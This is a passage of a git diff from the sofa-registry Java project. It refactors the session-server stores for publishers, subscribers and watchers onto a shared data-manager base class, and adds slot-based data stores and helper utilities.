publisher.getSourceAddress().getAddressString(); - Map publisherMap = connectIndex.get(connectId); - if (publisherMap == null) { - Map newPublisherMap = new ConcurrentHashMap<>(); - publisherMap = connectIndex.putIfAbsent(connectId, newPublisherMap); - if (publisherMap == null) { - publisherMap = newPublisherMap; - } - } - - publisherMap.put(publisher.getRegisterId(), publisher); - } - - private void removeIndex(Publisher publisher) { - removeConnectIndex(publisher); - } - - private void removeConnectIndex(Publisher publisher) { - String connectId = publisher.getSourceAddress().getAddressString(); - Map publisherMap = connectIndex.get(connectId); - if (publisherMap != null) { - publisherMap.remove(publisher.getRegisterId()); - } else { - LOGGER.warn("ConnectId {} not existed in Index to remove!", connectId); +public class SessionDataStore extends AbstractDataManager implements DataStore { + + private static final Logger LOGGER = LoggerFactory.getLogger(SessionDataStore.class); + + public SessionDataStore() { + super(LOGGER); + } + + @Override + public boolean add(Publisher publisher) { + ParaCheckUtil.checkNotNull(publisher.getVersion(), "publisher.version"); + ParaCheckUtil.checkNotNull(publisher.getRegisterTimestamp(), "publisher.registerTimestamp"); + + PublisherUtils.internPublisher(publisher); + Map publishers = + stores.computeIfAbsent(publisher.getDataInfoId(), k -> Maps.newConcurrentMap()); + + boolean toAdd = true; + Publisher existingPublisher = null; + write.lock(); + try { + existingPublisher = publishers.get(publisher.getRegisterId()); + if (existingPublisher != null) { + if (!existingPublisher.registerVersion().orderThan(publisher.registerVersion())) { + toAdd = false; } + } + if (toAdd) { + publishers.put(publisher.getRegisterId(), publisher); + } + } finally { + write.unlock(); } - - private void invalidateIndex(Publisher publisher) { - String connectId = publisher.getSourceAddress().getAddressString(); - invalidateConnectIndex(connectId); + // log without lock + if (existingPublisher != null && !toAdd) { + LOGGER.warn( + "conflict publisher {}, {}, exist={}, input={}", + publisher.getDataInfoId(), + publisher.getRegisterId(), + existingPublisher.registerVersion(), + publisher.registerVersion()); } - - private void invalidateConnectIndex(String connectId) { - connectIndex.remove(connectId); - } - -} \ No newline at end of file + return toAdd; + } + + @Override + public Map> getDataInfoIdPublishers(int slotId) { + throw new UnsupportedOperationException(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionInterests.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionInterests.java index 68341371e..a5d5a16e2 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionInterests.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionInterests.java @@ -16,418 +16,112 @@ */ package com.alipay.sofa.registry.server.session.store; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.SubscriberResult; -import com.alipay.sofa.registry.util.VersionsMapUtils; -import org.springframework.beans.factory.annotation.Autowired; - -import java.net.InetSocketAddress; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.collect.Maps; +import java.util.ArrayList; import java.util.Collection; -import java.util.Iterator; +import java.util.List; import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; +import org.springframework.util.CollectionUtils; /** - * * @author shangyu.wh * @version $Id: AbstractSessionInterests.java, v 0.1 2017-11-30 20:42 shangyu.wh Exp $ */ -public class SessionInterests implements Interests, ReSubscribers { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionInterests.class); - - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock - .readLock(); - private final Lock write = readWriteLock - .writeLock(); - - @Autowired - private SessionServerConfig sessionServerConfig; - - /** - * store all register subscriber - */ - private ConcurrentHashMap> interests = new ConcurrentHashMap<>(); - - private Map> connectIndex = new ConcurrentHashMap<>(); - - private Map>> resultIndex = new ConcurrentHashMap<>(); - - /** - * store subscriber interest dataInfo version belong one dataCenter - */ - private ConcurrentHashMap> interestVersions = new ConcurrentHashMap<>(); - - private Map> stopPushInterests = new ConcurrentHashMap<>(); - - @Override - public void add(Subscriber subscriber) { - - write.lock(); - try { - Map subscribers = interests.get(subscriber.getDataInfoId()); - - if (subscribers == null) { - Map newMap = new ConcurrentHashMap<>(); - subscribers = interests.putIfAbsent(subscriber.getDataInfoId(), newMap); - if (subscribers == null) { - subscribers = newMap; - } - } - - Subscriber existingSubscriber = subscribers.get(subscriber.getRegisterId()); - - if (existingSubscriber != null) { - LOGGER.warn("There is subscriber already exists,it will be overwrite! {}", - existingSubscriber); - } - - subscribers.put(subscriber.getRegisterId(), subscriber); - - addReSubscriber(subscriber); - - addIndex(subscriber); - - } finally { - write.unlock(); - } - - } - - @Override - public boolean deleteById(String registerId, String dataInfoId) { - - write.lock(); - try { - - Map subscribers = interests.get(dataInfoId); - - if (subscribers == null) { - LOGGER.error( - "Delete failed because subscriber is not registered for dataInfoId: {}", - dataInfoId); - return false; - } else { - Subscriber subscriberTodelete = subscribers.remove(registerId); - - if (subscriberTodelete == null) { - LOGGER.error( - "Delete failed because subscriber is not registered for registerId: {}", - registerId); - return false; - } else { - if (sessionServerConfig.isStopPushSwitch()) { - deleteReSubscriber(subscriberTodelete); - } - removeIndex(subscriberTodelete); - - return true; - } - } - } finally { - write.unlock(); - } - - } - - @Override - public boolean deleteByConnectId(String connectId) { - write.lock(); - try { - for (Map map : interests.values()) { - for (Iterator it = map.values().iterator(); it.hasNext();) { - Subscriber subscriber = (Subscriber) it.next(); - if (connectId.equals(subscriber.getSourceAddress().getAddressString())) { - - it.remove(); - if (sessionServerConfig.isStopPushSwitch()) { - deleteReSubscriber(subscriber); - } - - invalidateIndex(subscriber); - } - } - } - return true; - } catch (Exception e) { - LOGGER.error("Delete subscriber by connectId {} error!", connectId, e); - return false; - } finally { - write.unlock(); - } - } - - @Override - public long count() { - AtomicLong count = new AtomicLong(0); - for (Map map : interests.values()) { - count.addAndGet(map.size()); - } - return count.get(); - } - - @Override - public Map queryByConnectId(String connectId) { - return connectIndex.get(connectId); - } - - @Override - public Collection getInterests(String dataInfoId) { - Map subscribers = interests.get(dataInfoId); - if (subscribers == null) { - LOGGER.info("There is not registered subscriber for : {}", dataInfoId); - return null; - } - return subscribers.values(); - } - - @Override - public boolean checkInterestVersions(String dataCenter, String dataInfoId, Long version) { - - Map subscribers = interests.get(dataInfoId); - - if (subscribers == null || subscribers.isEmpty()) { - LOGGER.info("There are not Subscriber Existed! Who are interest with dataInfoId {} !", - dataInfoId); - return false; - } - - Map dataInfoVersions = interestVersions - .get(dataCenter); - if (dataInfoVersions == null) { - Map newDataInfoVersions = new ConcurrentHashMap<>(); - dataInfoVersions = interestVersions.putIfAbsent(dataCenter, newDataInfoVersions); - if (dataInfoVersions == null) { - dataInfoVersions = newDataInfoVersions; - } - } - - Long oldValue = dataInfoVersions.get(dataInfoId); - - return oldValue == null || version > oldValue; - - } - - @Override - public boolean checkAndUpdateInterestVersions(String dataCenter, String dataInfoId, Long version) { - read.lock(); - try { - - Map subscribers = interests.get(dataInfoId); - - if (subscribers == null || subscribers.isEmpty()) { - LOGGER.info( - "There are not Subscriber Existed! Who are interest with dataInfoId {} !", - dataInfoId); - return false; - } - - Map dataInfoVersions = interestVersions - .get(dataCenter); - if (dataInfoVersions == null) { - Map newDataInfoVersions = new ConcurrentHashMap<>(); - dataInfoVersions = interestVersions.putIfAbsent(dataCenter, newDataInfoVersions); - if (dataInfoVersions == null) { - dataInfoVersions = newDataInfoVersions; - } - } - - return VersionsMapUtils.checkAndUpdateVersions(dataInfoVersions, dataInfoId, version); - } finally { - read.unlock(); - } - } - - @Override - public Collection getInterestDataInfoIds() { - return interests.keySet(); - } - - private void addIndex(Subscriber subscriber) { - addConnectIndex(subscriber); - addResultIndex(subscriber); - } - - private void removeIndex(Subscriber subscriber) { - removeConnectIndex(subscriber); - removeResultIndex(subscriber); - } - - private void invalidateIndex(Subscriber subscriber) { - invalidateConnectIndex(subscriber.getSourceAddress().getAddressString()); - invalidateResultIndex(subscriber); - } - - private void addConnectIndex(Subscriber subscriber) { - - String connectId = subscriber.getSourceAddress().getAddressString(); - Map subscriberMap = connectIndex.get(connectId); - if (subscriberMap == null) { - Map newSubscriberMap = new ConcurrentHashMap<>(); - subscriberMap = connectIndex.putIfAbsent(connectId, newSubscriberMap); - if (subscriberMap == null) { - subscriberMap = newSubscriberMap; - } - } - - subscriberMap.put(subscriber.getRegisterId(), subscriber); - } - - private void addResultIndex(Subscriber subscriber) { - - SubscriberResult subscriberResult = new SubscriberResult(subscriber.getDataInfoId(), - subscriber.getScope()); - Map> mapSub = resultIndex.get(subscriberResult); - if (mapSub == null) { - Map> newMap = new ConcurrentHashMap<>(); - mapSub = resultIndex.putIfAbsent(subscriberResult, newMap); - if (mapSub == null) { - mapSub = newMap; - } - } - - InetSocketAddress address = new InetSocketAddress(subscriber.getSourceAddress() - .getIpAddress(), subscriber.getSourceAddress().getPort()); - - Map subscribers = mapSub.get(address); - if (subscribers == null) { - Map newSubs = new ConcurrentHashMap<>(); - subscribers = mapSub.putIfAbsent(address, newSubs); - if (subscribers == null) { - subscribers = newSubs; - } - } - - subscribers.put(subscriber.getRegisterId(), subscriber); - } - - private void removeConnectIndex(Subscriber subscriber) { - String connectId = subscriber.getSourceAddress().getAddressString(); - Map subscriberMap = connectIndex.get(connectId); - if (subscriberMap != null) { - subscriberMap.remove(subscriber.getRegisterId()); - } else { - LOGGER.warn("ConnectId {} not existed in Index to remove!", connectId); - } - } - - private void removeResultIndex(Subscriber subscriber) { - SubscriberResult subscriberResult = new SubscriberResult(subscriber.getDataInfoId(), - subscriber.getScope()); - Map> mapSub = resultIndex.get(subscriberResult); - if (mapSub != null) { - InetSocketAddress address = new InetSocketAddress(subscriber.getSourceAddress() - .getIpAddress(), subscriber.getSourceAddress().getPort()); - Map subscribers = mapSub.get(address); - if (subscribers != null) { - subscribers.remove(subscriber.getRegisterId()); - } else { - LOGGER.warn("InetSocketAddress {} not existed in Index to remove!", address); - } - - } else { - LOGGER.warn("SubscriberResult {} not existed in Index to remove!", subscriberResult); - } - } - - private void invalidateConnectIndex(String connectId) { - connectIndex.remove(connectId); - } - - private void invalidateResultIndex(Subscriber subscriber) { - - SubscriberResult subscriberResult = new SubscriberResult(subscriber.getDataInfoId(), - subscriber.getScope()); - Map> mapSub = resultIndex.get(subscriberResult); - if (mapSub != null) { - InetSocketAddress address = new InetSocketAddress(subscriber.getSourceAddress() - .getIpAddress(), subscriber.getSourceAddress().getPort()); - - mapSub.remove(address); - - } else { - LOGGER.warn("SubscriberResult {} not existed in Index to remove!", subscriberResult); - } - } - - @Override - public Map> querySubscriberIndex(String dataInfoId, - ScopeEnum scope) { - read.lock(); - try { - SubscriberResult subscriberResult = new SubscriberResult(dataInfoId, scope); - Map> map = resultIndex.get(subscriberResult); - if (map != null && !map.isEmpty()) { - return new ConcurrentHashMap<>(map); - } else { - return new ConcurrentHashMap<>(); - } - } finally { - read.unlock(); - } - - } - - @Override - public void addReSubscriber(Subscriber subscriber) { - if (sessionServerConfig.isStopPushSwitch()) { - - String dataInfoId = subscriber.getDataInfoId(); - - Map subscriberMap = stopPushInterests.get(dataInfoId); - if (subscriberMap == null) { - Map newMap = new ConcurrentHashMap<>(); - subscriberMap = stopPushInterests.putIfAbsent(dataInfoId, newMap); - if (subscriberMap == null) { - subscriberMap = newMap; - } - } - subscriberMap.put(subscriber.getRegisterId(), subscriber); - } - } - - @Override - public boolean deleteReSubscriber(Subscriber subscriber) { - - Map subscribers = stopPushInterests.get(subscriber.getDataInfoId()); - - if (subscribers == null) { - return false; - } else { - return subscribers.remove(subscriber.getRegisterId()) != null; - } - - } - - @Override - public Map> getReSubscribers() { - return stopPushInterests; - } - - @Override - public void clearReSubscribers() { - stopPushInterests.clear(); - } - - public SessionServerConfig getSessionServerConfig() { - return sessionServerConfig; - } - - /** - * Setter method for property sessionServerConfig. - * - * @param sessionServerConfig value to be assigned to property sessionServerConfig - */ - public void setSessionServerConfig(SessionServerConfig sessionServerConfig) { - this.sessionServerConfig = sessionServerConfig; - } -} \ No newline at end of file +public class SessionInterests extends AbstractDataManager implements Interests { + + private static final Logger LOGGER = LoggerFactory.getLogger(SessionInterests.class); + + public SessionInterests() { + super(LOGGER); + } + + @Override + public boolean add(Subscriber subscriber) { + ParaCheckUtil.checkNotNull(subscriber.getScope(), "subscriber.scope"); + ParaCheckUtil.checkNotNull(subscriber.getClientVersion(), "subscriber.clientVersion"); + + Subscriber.internSubscriber(subscriber); + + Subscriber existingSubscriber = addData(subscriber); + + if (existingSubscriber != null) { + LOGGER.warn( + "dups subscriber, {}, {}, exist={}/{}, input={}/{}", + existingSubscriber.getDataInfoId(), + existingSubscriber.getRegisterId(), + // not use get registerVersion, avoid the subscriber.version is null + existingSubscriber.getVersion(), + existingSubscriber.getRegisterTimestamp(), + subscriber.getVersion(), + existingSubscriber.getRegisterTimestamp()); + } + return true; + } + + @Override + public InterestVersionCheck checkInterestVersion( + String dataCenter, String datumDataInfoId, long version) { + Collection subscribers = getInterests(datumDataInfoId); + if (CollectionUtils.isEmpty(subscribers)) { + return InterestVersionCheck.NoSub; + } + for (Subscriber subscriber : subscribers) { + if (subscriber.checkVersion(dataCenter, version)) { + return InterestVersionCheck.Interested; + } + } + return InterestVersionCheck.Obsolete; + } + + @Override + public Collection getInterests(String datumDataInfoId) { + return getDatas(datumDataInfoId); + } + + @Override + public Map getInterestVersions(String dataCenter) { + final Map ret = Maps.newHashMapWithExpectedSize(stores.size()); + final String localDataCenter = sessionServerConfig.getSessionServerDataCenter(); + final boolean isLocalDataCenter = localDataCenter.equals(dataCenter); + for (Map.Entry> e : stores.entrySet()) { + Map subs = e.getValue(); + if (subs.isEmpty()) { + continue; + } + final String dataInfoId = e.getKey(); + long maxVersion = 0; + for (Subscriber sub : subs.values()) { + // not global sub and not local dataCenter, not interest the other dataCenter's pub + if (sub.getScope() != ScopeEnum.global && !isLocalDataCenter) { + continue; + } + final long pushVersion = sub.getPushVersion(dataCenter); + if (maxVersion < pushVersion) { + maxVersion = pushVersion; + } + } + ret.put(dataInfoId, new DatumVersion(maxVersion)); + } + + return ret; + } + + @Override + public Collection getInterestsNeverPushed() { + List subscribers = new ArrayList<>(512); + for (Map e : stores.values()) { + for (Subscriber subscriber : e.values()) { + if (!subscriber.hasPushed()) { + subscribers.add(subscriber); + } + } + } + return subscribers; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionWatchers.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionWatchers.java index 381dbebe8..1541df9cf 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionWatchers.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SessionWatchers.java @@ -20,210 +20,52 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.util.VersionsMapUtils; - -import java.util.Collection; -import java.util.HashMap; -import java.util.Iterator; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.atomic.AtomicLong; -import java.util.concurrent.locks.Lock; -import java.util.concurrent.locks.ReentrantReadWriteLock; +import org.apache.commons.collections.MapUtils; /** - * * @author shangyu.wh * @version $Id: SessionWatchers.java, v 0.1 2018-04-17 19:00 shangyu.wh Exp $ */ -public class SessionWatchers implements Watchers { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionWatchers.class); - - private final ReentrantReadWriteLock readWriteLock = new ReentrantReadWriteLock(); - private final Lock read = readWriteLock - .readLock(); - private final Lock write = readWriteLock - .writeLock(); - - /** - * store all register watchers - */ - private ConcurrentHashMap> watchers = new ConcurrentHashMap<>(); - - private Map> connectIndex = new ConcurrentHashMap<>(); - - /** - * store watcher dataInfo version - */ - private ConcurrentHashMap watcherVersions = new ConcurrentHashMap<>(); - - @Override - public void add(Watcher watcher) { - write.lock(); - try { - Map watcherMap = watchers.get(watcher.getDataInfoId()); - - if (watcherMap == null) { - Map newMap = new HashMap<>(); - watcherMap = watchers.putIfAbsent(watcher.getDataInfoId(), newMap); - if (watcherMap == null) { - watcherMap = newMap; - } - } - - Watcher existingWatcher = watcherMap.get(watcher.getRegisterId()); - - if (existingWatcher != null) { - LOGGER.warn("There is watcher already exists,it will be overwrite! {}", - existingWatcher); - } - - watcherMap.put(watcher.getRegisterId(), watcher); - - addConnectIndex(watcher); - - } finally { - write.unlock(); - } - } - - @Override - public boolean deleteByConnectId(String connectId) { - write.lock(); - try { - for (Map map : watchers.values()) { - for (Iterator it = map.values().iterator(); it.hasNext();) { - Watcher watcher = (Watcher) it.next(); - if (watcher != null - && connectId.equals(watcher.getSourceAddress().getAddressString())) { - it.remove(); - invalidateConnectIndex(watcher.getSourceAddress().getAddressString()); - } - } - } - return true; - } catch (Exception e) { - LOGGER.error("Delete watcher by connectId {} error!", connectId, e); - return false; - } finally { - write.unlock(); - } +public class SessionWatchers extends AbstractDataManager implements Watchers { + private static final Logger LOGGER = LoggerFactory.getLogger(SessionWatchers.class); + + public SessionWatchers() { + super(LOGGER); + } + + /** store watcher dataInfo version */ + private ConcurrentHashMap watcherVersions = + new ConcurrentHashMap<>(); + + @Override + public boolean add(Watcher watcher) { + Watcher.internWatcher(watcher); + + Watcher existingWatcher = addData(watcher); + if (existingWatcher != null) { + LOGGER.warn( + "dups watcher, {}, {}, exist={}/{}, input={}/{}", + existingWatcher.getDataInfoId(), + existingWatcher.getRegisterId(), + // not use get registerVersion, avoid the subscriber.version is null + existingWatcher.getVersion(), + existingWatcher.getRegisterTimestamp(), + watcher.getVersion(), + watcher.getRegisterTimestamp()); } - - @Override - public boolean checkWatcherVersions(String dataInfoId, Long version) { - read.lock(); - try { - - Map watcherMap = watchers.get(dataInfoId); - - if (watcherMap == null || watcherMap.isEmpty()) { - LOGGER.info("There are not Watcher Existed! Who are interest with dataInfoId {} !", - dataInfoId); - return false; - } - - return VersionsMapUtils.checkAndUpdateVersions(watcherVersions, dataInfoId, version); - } finally { - read.unlock(); - } + return true; + } + + @Override + public boolean checkWatcherVersions(String dataInfoId, long version) { + Map watcherMap = stores.get(dataInfoId); + if (MapUtils.isEmpty(watcherMap)) { + LOGGER.info( + "There are not Watcher Existed! Who are interest with dataInfoId {} !", dataInfoId); + return false; } - - @Override - public Collection getWatchers(String dataInfoId) { - read.lock(); - try { - - if (dataInfoId == null) { - throw new IllegalArgumentException("Input dataInfoId can not be null!"); - } - Map watcherMap = watchers.get(dataInfoId); - if (watcherMap == null) { - LOGGER.info("There is not registered Watcher for : {}", dataInfoId); - return null; - } - return watcherMap.values(); - } finally { - read.unlock(); - } - } - - @Override - public boolean deleteById(String registerId, String dataInfoId) { - write.lock(); - try { - - Map watcherMap = watchers.get(dataInfoId); - - if (watcherMap == null) { - LOGGER.error("Delete failed because watcher is not registered for dataInfoId: {}", - dataInfoId); - return false; - } else { - Watcher watcher = watcherMap.remove(registerId); - - if (watcher == null) { - LOGGER.error( - "Delete failed because watcher is not registered for registerId: {}", - registerId); - return false; - } else { - removeConnectIndex(watcher); - return true; - } - } - } finally { - write.unlock(); - } - } - - @Override - public Map queryByConnectId(String connectId) { - read.lock(); - try { - return connectIndex.get(connectId); - } finally { - read.unlock(); - } - } - - @Override - public long count() { - AtomicLong count = new AtomicLong(0); - for (Map map : watchers.values()) { - count.addAndGet(map.size()); - } - return count.get(); - } - - private void addConnectIndex(Watcher watcher) { - - String connectId = watcher.getSourceAddress().getAddressString(); - Map subscriberMap = connectIndex.get(connectId); - if (subscriberMap == null) { - Map newSubscriberMap = new ConcurrentHashMap<>(); - subscriberMap = connectIndex.putIfAbsent(connectId, newSubscriberMap); - if (subscriberMap == null) { - subscriberMap = newSubscriberMap; - } - } - - subscriberMap.put(watcher.getRegisterId(), watcher); - } - - private void removeConnectIndex(Watcher watcher) { - String connectId = watcher.getSourceAddress().getAddressString(); - Map subscriberMap = connectIndex.get(connectId); - if (subscriberMap != null) { - subscriberMap.remove(watcher.getRegisterId()); - } else { - LOGGER.warn("ConnectId {} not existed in Index to invalidate!", connectId); - } - } - - private void invalidateConnectIndex(String connectId) { - connectIndex.remove(connectId); - } - -} \ No newline at end of file + return VersionsMapUtils.checkAndUpdateVersions(watcherVersions, dataInfoId, version); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SlotSessionDataStore.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SlotSessionDataStore.java new file mode 100644 index 000000000..2cf46eade --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/SlotSessionDataStore.java @@ -0,0 +1,149 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.store; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.google.common.collect.Maps; +import java.util.*; +import java.util.concurrent.ConcurrentHashMap; +import org.glassfish.jersey.internal.guava.Sets; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.util.CollectionUtils; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-06 16:24 yuzhi.lyz Exp $ + */ +public class SlotSessionDataStore implements DataStore { + + @Autowired SlotTableCache slotTableCache; + + private final Map slot2DataStores = new ConcurrentHashMap<>(); + + private DataStore getOrCreateDataStore(String dataInfoId) { + int slotId = slotTableCache.slotOf(dataInfoId); + return slot2DataStores.computeIfAbsent(slotId, k -> new SessionDataStore()); + } + + @Override + public Collection getDatas(String dataInfoId) { + DataStore ds = getOrCreateDataStore(dataInfoId); + return ds.getDatas(dataInfoId); + } + + @Override + public List getDataList() { + List ret = new ArrayList<>(4096); + for (DataStore ds : slot2DataStores.values()) { + ret.addAll(ds.getDataList()); + } + return ret; + } + + @Override + public Publisher queryById(String registerId, String dataInfoId) { + DataStore ds = getOrCreateDataStore(dataInfoId); + return ds.queryById(registerId, dataInfoId); + } + + @Override + public Collection getDataInfoIds() { + Set set = Sets.newHashSetWithExpectedSize(1024); + for (DataStore ds : slot2DataStores.values()) { + set.addAll(ds.getDataInfoIds()); + } + return set; + } + + @Override + public Set getConnectIds() { + Set ret = Sets.newHashSet(); + slot2DataStores.values().forEach(d -> ret.addAll(d.getConnectIds())); + return ret; + } + + @Override + public Set collectProcessIds() { + Set ret = Sets.newHashSet(); + slot2DataStores.values().forEach(d -> ret.addAll(d.collectProcessIds())); + return ret; + } + + @Override + public Map> getDatas() { + Map> ret = new HashMap<>(512); + for (DataStore ds : slot2DataStores.values()) { + Map> m = ds.getDatas(); + for (Map.Entry> e : m.entrySet()) { + Map publisherMap = + ret.computeIfAbsent(e.getKey(), k -> new HashMap<>(128)); + publisherMap.putAll(e.getValue()); + } + } + return ret; + } + + @Override + public Map> getDataInfoIdPublishers(int slotId) { + DataStore ds = slot2DataStores.computeIfAbsent(slotId, k -> new SessionDataStore()); + return ds.getDatas(); + } + + @Override + public boolean add(Publisher publisher) { + DataStore ds = getOrCreateDataStore(publisher.getDataInfoId()); + return ds.add(publisher); + } + + @Override + public boolean deleteById(String registerId, String dataInfoId) { + DataStore ds = getOrCreateDataStore(dataInfoId); + return ds.deleteById(registerId, dataInfoId); + } + + @Override + public Map queryByConnectId(ConnectId connectId) { + Map ret = Maps.newHashMapWithExpectedSize(128); + for (DataStore ds : slot2DataStores.values()) { + Map m = ds.queryByConnectId(connectId); + if (!CollectionUtils.isEmpty(m)) { + ret.putAll(m); + } + } + return ret; + } + + @Override + public Map deleteByConnectId(ConnectId connectId) { + Map ret = Maps.newHashMap(); + for (DataStore ds : slot2DataStores.values()) { + ret.putAll(ds.deleteByConnectId(connectId)); + } + return ret; + } + + @Override + public long count() { + long count = 0; + for (DataStore ds : slot2DataStores.values()) { + count += ds.count(); + } + return count; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/StoreHelpers.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/StoreHelpers.java new file mode 100644 index 000000000..c36f25e50 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/StoreHelpers.java @@ -0,0 +1,91 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.store; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import java.util.Set; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-18 16:42 yuzhi.lyz Exp $ + */ +public final class StoreHelpers { + private StoreHelpers() {} + + public static Set collectConnectId(Map map) { + Set sets = Sets.newHashSet(); + map.values().forEach(r -> sets.add(r.connectId())); + return sets; + } + + public static Set collectConnectIds( + Map> maps) { + Set sets = Sets.newHashSet(); + maps.values().forEach(m -> sets.addAll(collectConnectId(m))); + return sets; + } + + public static long count(Map> maps) { + long count = 0; + for (Map map : maps.values()) { + count += map.size(); + } + return count; + } + + public static Map getByConnectId( + ConnectId connectId, Map> maps) { + Map retMap = Maps.newHashMap(); + for (Map m : maps.values()) { + for (T r : m.values()) { + if (connectId.equals(r.connectId())) { + retMap.put(r.getRegisterId(), r); + } + } + } + return retMap; + } + + public static Set collectProcessIds( + Map> maps) { + HashSet processIds = Sets.newHashSet(); + for (Map map : maps.values()) { + for (T t : map.values()) { + if (t.getProcessId() != null) { + processIds.add(t.getProcessId()); + } + } + } + return processIds; + } + + public static Map copyMap(Map m) { + Map ret = new HashMap<>(m.size()); + for (Map.Entry e : m.entrySet()) { + if (!e.getValue().isEmpty()) { + ret.put(e.getKey(), new HashMap<>(e.getValue())); + } + } + return ret; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Watchers.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Watchers.java index b4d401042..f85f1368a 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Watchers.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/store/Watchers.java @@ -18,31 +18,18 @@ import com.alipay.sofa.registry.common.model.store.Watcher; -import java.util.Collection; - /** - * * @author shangyu.wh * @version $Id: SessionInterests.java, v 0.1 2017-11-30 15:53 shangyu.wh Exp $ */ public interface Watchers extends DataManager { - /** - * query watcher by dataInfoID - * - * @param dataInfoId - * @return - */ - Collection getWatchers(String dataInfoId); - - /** - * check watchers interest dataInfoId version - * if not exist add - * else check and update bigger one - * - * @param dataInfoId - * @param version - * @return - */ - boolean checkWatcherVersions(String dataInfoId, Long version); -} \ No newline at end of file + /** + * check watchers interest dataInfoId version if not exist add else check and update bigger one + * + * @param dataInfoId + * @param version + * @return + */ + boolean checkWatcherVersions(String dataInfoId, long version); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/AppRevisionHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/AppRevisionHandlerStrategy.java new file mode 100644 index 000000000..f6f4172c3 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/AppRevisionHandlerStrategy.java @@ -0,0 +1,59 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.strategy; + +import com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse; +import com.alipay.sofa.registry.common.model.client.pb.MetaHeartbeatResponse; +import com.alipay.sofa.registry.common.model.client.pb.ServiceAppMappingResponse; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.core.model.RegisterResponse; +import java.util.List; + +public interface AppRevisionHandlerStrategy { + + /** + * appRevision register + * + * @param appRevision + * @param response + */ + void handleAppRevisionRegister(AppRevision appRevision, RegisterResponse response); + + /** + * query apps by services + * + * @param services + * @return + */ + ServiceAppMappingResponse queryApps(List 